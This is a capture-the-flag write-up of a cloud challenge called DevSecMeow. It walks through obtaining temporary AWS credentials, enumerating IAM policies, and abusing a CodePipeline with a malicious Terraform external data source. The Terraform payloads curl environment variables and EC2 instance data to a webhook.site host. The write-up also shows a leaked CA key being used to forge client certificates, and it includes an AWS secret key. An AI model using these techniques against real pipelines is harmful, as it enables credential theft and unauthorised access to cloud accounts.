Level 7A: DevSecMeow (Cloud)
The first step for this challenge is to obtain "temporary credentials" (probably AWS access key and secret).
According to the challenge website, to obtain credentials we need to first "submit required details" here.
That endpoint returns two AWS S3 URLs:
"csr": "https://devsecmeow2023certs.s3.amazonaws.com/1696048730-67d944c38e40449f852502ef371791e1/client.csr?AWSAccessKeyId=ASIATMLSTF3N3GVCQGNN&Signature=L%2B3oUY%2Bx92j...",
"crt": "https://devsecmeow2023certs.s3.amazonaws.com/1696048730-67d944c38e40449f852502ef371791e1/client.crt?AWSAccessKeyId=ASIATMLSTF3N3GVCQGNN&Signature=MMmZDruI0..."
We can deduce that "csr" stands for Certificate Signing Request and "crt" stands for certificate. After some research, I learnt that the URLs are S3 presigned URLs which allows users in possession of these URLs to upload or download resources from the S3 bucket.
The challenge website provides some useful hints on interacting with these URLs:
How do I interact with the URLs?
- Look at the URL
- One for upload, one for download
Based on this description, we can guess that the "csr" URL is for uploading our "details" via the CSR, while the "crt" is for downloading the signed certificate that we can use to authenticate ourselves.
First, I generated a CSR and private key using openssl:
openssl req -newkey rsa:2048 -keyout private.pem -out MYCSR.csr
Then I wrote a script to upload the CSR and grab the signed certificate.
import requests
import os
import shlex
import time
x = requests.get("https://61lxjmt991.execute-api.ap-southeast-1.amazonaws.com/development/generate").json()
csr = x["csr"]
crt = x["crt"]
os.system(f"curl -X PUT -T ./MYCSR.csr {shlex.quote(csr)}")
os.system(f"curl {shlex.quote(crt)} > cert.crt")
Now we can verify that we have a signed certificate:
➜ openssl x509 -in cert.crt -text -noout
Version: 1 (0x0)
Serial Number:
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = devsecmeow-staging
Not Before: Sep 30 04:50:55 2023 GMT
Not After : Oct 30 04:50:55 2023 GMT
Subject: C = SG, ST = Singapore, L = Singapore, O = Skeld, OU = Crewmate, CN = amogus.com, emailAddress = [email protected]
Subject Public Key Info:
Next, we use the signed certificate to authenticate ourselves against the second endpoint (
➜ curl --cert cert.crt --key private.pem -k
"Message": "Hello new agent, use the credentials wisely! It should be live for the next 120 minutes! Our antivirus will wipe them out and the associated resources after the expected time usage.",
"Secret_Key": "QxEaLu8t6amjkeZxbV3p7Ii+9V42ljqZZgULjJdP"
Now begins the enumeration phase. I used awsenum to quickly enumerate the permissions attached to this access key.
We have the iam list-roles
, iam get-policy
, iam get-policy-version
and iam list-role-policies
permissions, so there's lots of information we can retrieve.
There are a few policies with 'agent' in them, which is probably what's assigned to our access key. Let's look at one of them:
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"Resource": "*"
"Sid": "VisualEditor2",
"Effect": "Allow",
"Action": [
"Resource": "arn:aws:iam::232705437403:user/${aws:username}"
"Sid": "VisualEditor3",
"Effect": "Allow",
"Action": [
"Resource": "arn:aws:codepipeline:ap-southeast-1:232705437403:devsecmeow-pipeline"
"Sid": "VisualEditor4",
"Effect": "Allow",
"Action": [
"Resource": "arn:aws:s3:::devsecmeow2023zip/*"
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-16T07:15:52+00:00"
This reveals that we have additional permissions to read CodePipeline configuration, as well as upload objects to a devsecmeow2023zip
S3 bucket.
Let's examine the CodePipeline:
"pipeline": {
"name": "devsecmeow-pipeline",
"roleArn": "arn:aws:iam::232705437403:role/codepipeline-role",
"artifactStore": {
"type": "S3",
"location": "devsecmeow2023zip"
"stages": [
"name": "Source",
"actions": [
"name": "Source",
"actionTypeId": {
"category": "Source",
"owner": "AWS",
"provider": "S3",
"version": "1"
"runOrder": 1,
"configuration": {
"PollForSourceChanges": "false",
"S3Bucket": "devsecmeow2023zip",
"S3ObjectKey": "rawr.zip"
"outputArtifacts": [
"name": "source_output"
"inputArtifacts": []
"name": "Build",
"actions": [
"name": "TerraformPlan",
"actionTypeId": {
"category": "Build",
"owner": "AWS",
"provider": "CodeBuild",
"version": "1"
"runOrder": 1,
"configuration": {
"ProjectName": "devsecmeow-build"
"outputArtifacts": [
"name": "build_output"
"inputArtifacts": [
"name": "source_output"
"name": "Approval",
"actions": [
"name": "Approval",
"actionTypeId": {
"category": "Approval",
"owner": "AWS",
"provider": "Manual",
"version": "1"
"runOrder": 1,
"configuration": {},
"outputArtifacts": [],
"inputArtifacts": []
"version": 1
"metadata": {
"pipelineArn": "arn:aws:codepipeline:ap-southeast-1:232705437403:devsecmeow-pipeline",
"created": "2023-07-21T23:05:14.065000+08:00",
"updated": "2023-07-21T23:05:14.065000+08:00"
The rawr.zip
file from the devsecmeow2023zip
bucket is fetched in the "Source" stage, and used as input to the "Build" stage. This stage runs the CodeBuild project devsecmeow-build
Let's dump the configuration for the devsecmeow-build
project too:
"projects": [
"name": "devsecmeow-build",
"arn": "arn:aws:codebuild:ap-southeast-1:232705437403:project/devsecmeow-build",
"source": {
"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - env\n - cd /usr/bin\n - curl -s -qL -o terraform.zip https://releases.hashicorp.com/terraform/1.4.6/terraform_1.4.6_linux_amd64.zip\n - unzip -o terraform.zip\n - cd \"$CODEBUILD_SRC_DIR\"\n - ls -la \n - terraform init \n - terraform plan\n",
"insecureSsl": false
"artifacts": {
"name": "devsecmeow-build",
"packaging": "NONE",
"overrideArtifactName": false,
"encryptionDisabled": false
"cache": {
"type": "NO_CACHE"
"environment": {
"image": "aws/codebuild/amazonlinux2-x86_64-standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
"name": "flag1",
"value": "/devsecmeow/build/password",
"privilegedMode": false,
"imagePullCredentialsType": "CODEBUILD"
"serviceRole": "arn:aws:iam::232705437403:role/codebuild-role",
"timeoutInMinutes": 15,
"queuedTimeoutInMinutes": 480,
"encryptionKey": "arn:aws:kms:ap-southeast-1:232705437403:alias/aws/s3",
"tags": [],
"created": "2023-07-21T23:05:13.010000+08:00",
"lastModified": "2023-07-21T23:05:13.010000+08:00",
"badge": {
"badgeEnabled": false
"logsConfig": {
"cloudWatchLogs": {
"status": "ENABLED",
"groupName": "devsecmeow-codebuild-logs",
"streamName": "log-stream"
"s3Logs": {
"status": "DISABLED",
"encryptionDisabled": false
"projectVisibility": "PRIVATE"
"projectsNotFound": []
The first important thing is the environment section:
"environment": {
"image": "aws/codebuild/amazonlinux2-x86_64-standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
"name": "flag1",
"value": "/devsecmeow/build/password",
"privilegedMode": false,
"imagePullCredentialsType": "CODEBUILD"
This indicates that the first flag is in the environment variable flag1
The next important thing here is buildspec
, which describes the command executed to "build" the code:
version: 0.2
- env
- cd /usr/bin
- curl -s -qL -o terraform.zip https://releases.hashicorp.com/terraform/1.4.6/terraform_1.4.6_linux_amd64.zip
- unzip -o terraform.zip
- ls -la
- terraform init
- terraform plan
After fetching the rawr.zip
file from the "Source" stage (which unzips the file into $CODEBUILD_SRC_DIR
), the "Build" stage installs Terraform and executes terraform plan
. Since we control the rawr.zip
file, we can supply arbitrary Terraform configuration to be executed with terraform plan
A quick google search for "Terraform Plan RCE" reveals this blog post which provides this PoC:
data "external" "example" {
program = ["python", "${path.module}/example-data-source.py"]
query = {
# arbitrary map from strings to strings, passed
# to the external program as the data query.
id = "abc123"
I modified this slightly to exfiltrate environment variables:
data "external" "example" {
program = ["python3", "-c",
"import os;out=os.system('env 2>&1 | cat > /tmp/x');os.system('curl -d @/tmp/x https://webhook.site/e881cd14-7e51-44d4-a131-9079df66f792')"]
and wrote a quick shell script to zip and upload the terraform.tf
zip -r rawr terraform.tf
aws s3 cp rawr.zip s3://devsecmeow2023zip/rawr.zip
After waiting for a few minutes, we receive a request on our webhook with all the environment variables, including the first part of the flag:
Unfortunately, there's no sign of the second part of the flag. So it's time for more enumeration 😩. Fortunately for you, I will just skip to the parts that worked.
So I dumped the policy for the codebuild-role
. Presumably these are the permissions that the CodeBuild worker has:
"RoleName": "codebuild-role",
"PolicyName": "policy_code_build",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
"Action": [
"Effect": "Allow",
"Resource": [
"Action": [
"Effect": "Allow",
"Resource": "arn:aws:kms:ap-southeast-1:232705437403:key/6b677475-cc95-4f85-8baa-2f30290cde9d"
"Action": "ssm:GetParameters",
"Effect": "Allow",
"Resource": "arn:aws:ssm:ap-southeast-1:232705437403:parameter/devsecmeow/build/password"
"Action": "ec2:DescribeInstance*",
"Effect": "Allow",
"Resource": "*"
"Action": [
"Effect": "Allow",
"Resource": [
Most of these permissions look pretty reasonable and justifiable for a CodeBuild worker, except for
"Action": "ec2:DescribeInstance*",
"Effect": "Allow",
"Resource": "*"
This permission doesn't seem to be used at all. It's especially suspicious because the Action
ends with *
, which allows any action starting with ec2:DescribeInstance
to be executed. Additionally, the challenge website states that there is a 'known misconfiguration'.
Looking at the reference for EC2 actions, we can determine that ec2:DescribeInstance*
matches the following actions:
- DescribeInstanceAttribute
- DescribeInstanceConnectEndpoints
- DescribeInstanceCreditSpecifications
- DescribeInstanceEventNotificationAttributes
- DescribeInstanceEventWindows
- DescribeInstanceStatus
- DescribeInstanceTypeOfferings
- DescribeInstanceTypes
- DescribeInstances
It seems DescribeInstanceAttribute
would be the most helpful in giving us more information, so let's look at its documentation:
Describes the specified attribute of the specified instance.
You can specify only one attribute at a time.
Valid attribute values are:
Hmm userData
looks very interesting!
First we run DescribeInstances
to list the instance IDs:
data "external" "example" {
program = ["python3", "-c",
"import os;out=os.system('aws ec2 describe-instances 2>&1 | cat > /tmp/x');os.system('curl -d @/tmp/x https://webhook.site/e881cd14-7e51-44d4-a131-9079df66f792')"]
This reveals two instance IDs: i-02602bf0cf92a4ee1
at IP '' and i-02423bae26b4cfd9a
at IP '' (this corresponds to the IP of the service that provided the access keys).
I then proceeded to dump the userData
attribute for i-02602bf0cf92a4ee1
data "external" "example" {
program = ["python3", "-c",
"import os;out=os.system('aws ec2 describe-instance-attribute --instance-id i-02602bf0cf92a4ee1 --attribute userData 2>&1 | cat > /tmp/x');os.system('curl -d @/tmp/x https://webhook.site/e881cd14-7e51-44d4-a131-9079df66f792')"]
This yielded a very long base64 string which decoded to:
sudo apt update
sudo apt upgrade -y
sudo apt install nginx -y
sudo apt install awscli -y
cat <<\EOL > /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
http {
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
server {
listen 443 ssl default_server;
listen [::]:443 ssl default_server;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
ssl_certificate /etc/nginx/server.crt;
ssl_certificate_key /etc/nginx/server.key;
ssl_client_certificate /etc/nginx/ca.crt;
ssl_verify_client optional;
ssl_verify_depth 2;
location / {
if ($ssl_client_verify != SUCCESS) { return 403; }
proxy_pass http://flag_server;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip off;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
cat <<\EOL > /etc/nginx/sites-enabled/default
upstream flag_server {
server localhost:3000;
server {
listen 3000;
root /var/www/html;
index index.html;
server_name _;
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
cat <<\EOL > /etc/nginx/server.crt
cat <<\EOL > /etc/nginx/server.key
cat <<\EOL > /etc/nginx/ca.crt
cat <<\EOL > /etc/nginx/ca.key
aws s3 cp s3://devsecmeow2023flag2/index.html /tmp/
sudo cp /tmp/index.html /var/www/html
rm /tmp/index.html
sudo systemctl restart nginx
Finally we see some reference to 'flag2'!
If we visit directly, we get a permission denied error, so it is clear we will need to authenticate ourselves somehow. Unfortunately, using the cert.crt
in the first step doesn't work. However, we have leaked the server's ca.key
and ca.crt
, so we can just authenticate ourselves using that instead:
➜ curl --cert ca.crt --key ca.key --cacert ca.crt -k | grep -i flag2
<p class="lead text-muted">Flag2: yOuR_d3vSeCOps_P1peL1nEs!!<##:3##>}</p>
The combined flag is: